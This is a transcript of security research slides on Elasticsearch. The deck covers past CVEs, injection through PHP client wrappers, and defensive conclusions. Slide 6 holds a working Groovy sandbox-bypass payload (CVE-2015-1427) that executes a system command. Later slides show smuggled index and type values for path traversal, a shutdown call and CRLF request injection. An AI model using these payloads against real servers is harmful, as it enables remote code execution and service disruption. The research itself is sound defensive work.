Ivan Novikov - ElasticSearch is secure?

Transcript

1. 1.

   ElasticSearch: Is it secure? @d0znpp Wallarm research

2. 2.

   What is ElasticSearch? “Elasticsearch is a distributed RESTful search engine

   built for the cloud.“ Official repo: https://github.com/elastic/elasticsearch Distributed Lucene instances broker • RESTful API • Native Java API Clients: https://www.elastic.co/guide/index.html
3. 3.

   Previous works • NoSQL Injection for Elasticsearch Kindle Edition by

   Gary Drocella http://goo.gl/OnfMOz => ACL to 9200 and 9300 • NoSQL Injections: Moving Beyond 'or '1'='1'. Matt Bromiley Derbycon 2014 http://goo.gl/UBh42h => do not produce JSON by strings concatenation • Securing ElasticSearch http://goo.gl/Ik3023 => Use Nginx to provide BasicAuth and other advices
4. 4.

   None
5. 5.

   Previous bugs: 5 CVE https://www.elastic.co/community/security • CVE-2015-4165 is not disclosed

   yet ;( “All Elasticsearch versions from 1.0.0 to 1.5.2 are vulnerable to an attack that uses Elasticsearch to modify files read and executed by certain other applications.” • CVE-2015-3337 path trav. https://goo.gl/YWwu3a • CVE-2015-1427 Groovy RCE https://goo.gl/Bi9SfC • CVE-2014-6439 CORS issue https://goo.gl/7kMxod • CVE-2014-3120 Java RCE https://goo.gl/iZL5L8
6. 6.

   Sandbox bypass 1427 { "size":1, "script_fields":{ "lupin":{ "script":"java.lang.Math.class.forName(\"java.lang.Runti me\").getRuntime().exec(\"id\").getText()" }

   } }
7. 7.

   What is my point? BugBounty https://research.facebook.com/search?q=a%20 200 https://research.facebook.com/search?q=a%22 500 $1000

   reward for injection into JSON to ElasticSearch But it might be RCE...
8. 8.

   What is my point? • Want to hack it through

   web-applications • Because it’s really rare case when ES is present at network perimeter • To check wrappers for different platforms for input validation attacks • Yes, the same as with Memcached injections https://goo.gl/9qV620 [BHUS-14]
9. 9.

   4 popular clients (wrappers) http://jolicode.com/blog/elasticsearch-php-clients-test- drive • Original (elasticsearch) •

   Sherlock • Elastica • Nervetattoo Let’s start from PHP
10. 10.

    • RESTful tricks (while user data at URL ../ et

    al.) • JSON syntax breakers ( \ “ } { ] [ ) • Native Java API • Filename tricks (each index is a folder with the same name). I suggests that it is CVE-2015-4165 vector ;) Input validation kinds
11. 11.

    • RESTful tricks (while user data at URL ../ et

    al.) • JSON syntax breakers ( \ “ } { ] [ ) • Native Java API <- Only about RESTful clients now • Filename tricks (each index is a folder with the same name). I suggests that it is CVE-2015-4165 vector ;) <- ES internals, not clients Input validation kinds
12. 12.

    • All URI parts goes through PHP urlencode(). But dot

    (0x2e) IS NOT encoded by RFC • json_encode protects from injections into values $params = array(); $params['body'] = array('testField' => 'abc'); $params['index'] = '..'; $params['type'] = '_shutdown'; // Document will be indexed to my_index/my_type/<autogenerated_id> $ret = $client->index($params); elasticsearch original
13. 13.

    • URI parts “as is” • json_encode protects from injections

    into values $results = $es ->setIndex("what/../do/you/want!/") ->setType("and/../here/also!") ->search('title:cool&key=value&script_fields');//CVE nervetattoo
14. 14.

    But it’s a raw socket, baby! $results = $es ->setIndex("

    HTTP/1.1\r\n…”script”:”...”") // CVE ->setType("my_type") ->search('title:cool'); nervetattoo
15. 15.

    • Use DSL methods • Index name and type are

    not for users • Do not concatenate strings to JSON • Always filter data before putting into wrappers Conclusions
16. 16.

    https://twitter.com/d0znpp blog.wallarm.com Thx!